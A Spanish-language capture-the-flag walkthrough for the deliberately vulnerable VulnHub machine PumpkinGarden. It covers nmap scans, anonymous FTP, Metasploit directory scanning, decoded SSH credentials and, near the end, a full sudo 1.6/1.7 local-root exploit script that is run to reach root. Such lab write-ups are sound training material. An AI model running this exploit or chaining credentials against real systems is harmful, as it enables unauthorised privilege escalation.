Mission Pumpkin V1 PumpkinGarden

Apuntes incompletos

Mission-Pumpkin v1.0 is a beginner level CTF series, created by keeping beginners in mind. This CTF series is for people who have basic knowledge of hacking tools and techniques but struggling to apply known tools. I believe that machines in this series will encourage beginners to learn the concepts by solving problems. PumpkinGarden is Level 1 of series of 3 machines under Mission-Pumpkin v1.0. The end goal of this CTF is to gain access to PumpkinGarden_key file stored in the root account.

1) Me descargo la maquina de https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkingarden,321/

2) Importo la maquina en virtualbox.

Nota: Si no puedes importar bien la maquina. renombra .ova por .ova.tary extrae el disco duro csec-disk001.vmdk
Crea una maquina virtual nueba tipo Linux Ubuntu 64 y asignale el disco extraido.

3) Arranco la maquina a auditar en virtualbox

Nota2: le configuro la red como adaptador solo anfitrion.

La red de mis VM es 192.168.56.XX(este dato puede ser diferente en tu equipo (ip a |grep global))
Luego hago un nmap -sn 192.168.56.0/24 o nmap -sn 192.168.56.* a ver que sale:



  • #### Enumeracion La ip de la maquina es la 192.168.56.103 Enumero Puertos:
em50l@jejo.es$ nmap -F -Pn 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:08 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00037s latency).
Not shown: 99 closed ports
PORT   STATE SERVICE
21/tcp open  ftp

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

Solo ftp??? Saco mas detalles…

em50l@jejo.es$ nmap  192.168.56.103 -sC -p 21

Starting Nmap 7.60 ( https://nmap.org ) at 2019-07-20 20:15 CEST
Nmap scan report for 192.168.56.103
Host is up (0.00048s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status

Nmap done: 1 IP address (1 host up) scanned in 0.71 seconds

Es un Ftp anonimo. Luego lo puedo explorar facilmente.




Esta vez voy ha usar curl en lugar de mc.

em50l@jejo.es$ curl ftp://192.168.56.103/
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
em50l@jejo.es$ curl ftp://192.168.56.103/note.txt
Hello Dear! 
Looking for route map to PumpkinGarden? I think jack can help you find it.
em50l@jejo.es$ 

Si Quisiera ver la comunicacion ftp al detalle puedo usar la opcion -v.

em50l@jejo.es$ curl -v ftp://192.168.56.103/
*   Trying 192.168.56.103...
* TCP_NODELAY set
* Connected to 192.168.56.103 (192.168.56.103) port 21 (#0)
< 220 Welcome to Pumpkin's FTP service.
> USER anonymous
< 331 Please specify the password.
> PASS ftp@example.com
< 230 Login successful.
> PWD
< 257 "/"
* Entry path is '/'
> EPSV
* Connect data stream passively
< 229 Entering Extended Passive Mode (|||40149|).
*   Trying 192.168.56.103...
* TCP_NODELAY set
* Connecting to 192.168.56.103 (192.168.56.103) port 40149
* ftp_perform ends with SECONDARY: 0
* Connected to 192.168.56.103 (192.168.56.103) port 21 (#0)
> TYPE A
< 200 Switching to ASCII mode.
> LIST
< 150 Here comes the directory listing.
* Maxdownload = -1
-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
* Remembering we are in dir ""
< 226 Directory send OK.
* Connection #0 to host 192.168.56.103 left intact

Segun Lo de Arriba un usuario parece ser jack.




  • Ataque diccionario. (Parece que no funciona)
  • pruebo con mc ftp://jack:PumpkinGarden@192.168.56.103/ (Potra???) Creo que hay hay que elaborar un diccionario con los archivos extraidos del ftp.
  Izquierdo     Archivo     Utilidades     Opciones     Derecho
┌<─ ftp://jack@192.168.56.103/ ─.[^]>┐┌─────────────── Información ─────────────┐
.n     Nombre  Tamaño fecha Modifi││  Midnight Commander 4.8.19
/..            DIR-ANT20 jul 20:05│├─────────────────────────────────────────┤
/bin              409611 jun 17:55││ Archivo: home                           │
/boot             409611 jun 17:56││  Ubicado:       0h:23h                  │
/dev              404020 jul 14:51││  Modo:          drwxr-xr-x (0755)       │
/etc              409620 jul 14:51││  Nº enlaces:    1                       │
/home          │   4096│11 jun 18:25││  Dueño:         root/root               │
/lib              409611 jun 17:55││  Tamaño:        4096 (8 bloques)        │
/lib64            409611 jun 17:51││  Cambiado:      11 jun 18:25            │
/lost+found      1638411 jun 17:43││  Modificado:    11 jun 18:25            │
/media            409611 jun 17:43││  Accedido:      11 jun 18:25            │
/mnt              409611 abr  2014││  Sistema en     /home                   │
/opt              409611 jun 17:46││    Origen:      /dev/sda2               │
/proc                020 jul 14:51││    Tipo:        ext4 (802h)             │
├────────────────────────────────────┤│  Espacio libre: 148G/190G (77%)         │
│/home                               ││  Inodos libres: 12652894/12730368 (99%) │
└────────────────────────────────────┘└─────────────────────────────────────────┘
Consejo: Con Alt-! puede ejecutar programas y ver la salida en el visor.
em50l@jejo.es$                                                                    [^]
 1Ayuda  2Menú 3Ver    4Editar  5Copiar  6RenMov 7Mkdir  8Borrar  9Menú   10Salir

Veo que en home hay los siguientes usuarios: goblin jack scarecrow y dentro de la carpeta jack hay una nota:

Are you here for keys to pumpkin garden?
I'm afraid that scarecrow has just stolen the keys from me...








Dias mas tarde ;)
Creo que hay que escanear mas puertos.

em50l@jejo.es:~$ nmap -p1-65534 -n -A 192.168.56.103

Starting Nmap 7.60 ( https://nmap.org ) at 2019-08-01 02:06 CEST
Nmap scan report for 192.168.56.103
Host is up (0.0083s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13 00:02 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
|   2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
|   256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_  256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (EdDSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.65 seconds

Veo que hay un Apache en el puerto 1515
Y un SSH en el puerto 3535





Pruebo ssh con el usuario y la contraseña del ftp (reutilizacion de contraseñas)

em50l@jejo.es$ sshpass -p 'PumpkinGarden' ssh jack@192.168.56.101 -p 3535 
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
              Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Sun Aug 25 18:20:43 2019 from 192.168.56.1

jack@Pumpkin:~$ #  !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios

Ahora necesitaria una escalada de privilegios.

Accedo via ssh al arbol de archivos a ver que veo.

em50l@jejo.es$ mc sh://jack@192.168.56.101:3535 
No protocol specified

fish: Esperando línea de inicio...
jack@192.168.56.101's password: 





Enumeracion http

msf5 > use auxiliary/scanner/http/dir_scanner 
msf5 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/dir_scanner) > set rport 1515
msf5 auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.56.101
[+] Found http://192.168.56.101:1515/icons/ 403 (192.168.56.101)
[+] Found http://192.168.56.101:1515/img/ 200 (192.168.56.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Bien he encontrado icons e img

Lo intento de otra forma

msf5 > use auxiliary/scanner/http/brute_dirs
msf5 auxiliary(scanner/http/brute_dirs) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/brute_dirs) > set rport 1515
msf5 auxiliary(scanner/http/brute_dirs) > run

[*] Using code '404' as not found.
[+] Found http://192.168.56.101:1515/img/ 200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

dir_listing sin resultados

msf5 > use auxiliary/scanner/http/dir_listing 
msf5 auxiliary(scanner/http/dir_listing) > set rport 1515
msf5 auxiliary(scanner/http/dir_listing) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/dir_listing) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 > use auxiliary/scanner/http/files_dir
msf5 auxiliary(scanner/http/files_dir) > set rhosts 192.168.56.101
msf5 auxiliary(scanner/http/files_dir) > set rport 1515
msf5 auxiliary(scanner/http/files_dir) > run

[*] Using code '404' as not found for files with extension .bak
[*] Using code '404' as not found for files with extension .exe
[*] Using code '404' as not found for files with extension .html
[+] Found http://192.168.56.101:1515/index.html 200
...
[*] Using code '404' as not found for files with extension 
[+] Found http://192.168.56.101:1515/img 301
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Cacharreando encuentro:

em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt
c2NhcmVjcm93IDogNVFuQCR5

base64???

em50l@jejo.es$ curl http://192.168.56.101:1515/img/hidden_secret/clue.txt |base64 --decode
scarecrow : 5Qn@$y

Parece un usuario y contraseña.

em50l@jejo.es$ sshpass -p '5Qn@$y' ssh scarecrow@192.168.56.101 -p 3535 
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
              Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Thu Jun 13 00:35:51 2019 from 192.168.1.106
scarecrow@Pumpkin:~$ #  !!!Consegido Acceso modo usuario!!! Continuaremos en la seccion Escalada de privilegios
scarecrow@Pumpkin:~$ ls
note.txt
scarecrow@Pumpkin:~$ cat note.txt 

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)! 
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.

sshpass -p 'Y0n$M4sy3D1t' ssh goblin@192.168.56.101 -p 3535

em50l@jejo.es$ sshpass -p 'Y0n$M4sy3D1t' ssh goblin@192.168.56.101 -p 3535 
Warning: Permanently added '[192.168.56.101]:3535' (ECDSA) to the list of known hosts.
------------------------------------------------------------------------------
              Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
Last login: Thu Jun 13 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ ls
note  
goblin@Pumpkin:~$ cat note 

Hello Friend! I heard that you are looking for PumpkinGarden key. 
But Key to the garden will be with LordPumpkin(ROOT user), don't worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.

Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

goblin@Pumpkin:~$ 


El codigo del exploit que indican es este:

#!/bin/sh
# Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# local root exploit
# March 2010
# automated by kingcope
# Full Credits to Slouching
echo Tod Miller Sudo local root exploit
echo by Slouching
echo automated by kingcope
if [ $# != 1 ]
then
echo "usage: ./sudoxpl.sh <file you have permission to edit>"
exit
fi
cd /tmp
cat > sudoedit << _EOF
#!/bin/sh
echo ALEX-ALEX
su
/bin/su
/usr/bin/su
_EOF
chmod a+x ./sudoedit
sudo ./sudoedit $1

goblin@Pumpkin:~$ cat > sudoedit << _EOF
> #!/bin/sh
> echo ALEX-ALEX
> su
> /bin/su
> /usr/bin/su
> _EOF
goblin@Pumpkin:~$ chmod a+x ./sudoedit
goblin@Pumpkin:~$ sudo ./sudoedit $1
[sudo] password for goblin: 
Sorry, try again.
[sudo] password for goblin: 
ALEX-ALEX
root@Pumpkin:/home/goblin# cd
root@Pumpkin:~# cat PumpkinGarden_Key 
Q29uZ3JhdHVsYXRpb25zIQ==

investivar wmap

https://jonathansblog.co.uk/metasploit-for-website-pentest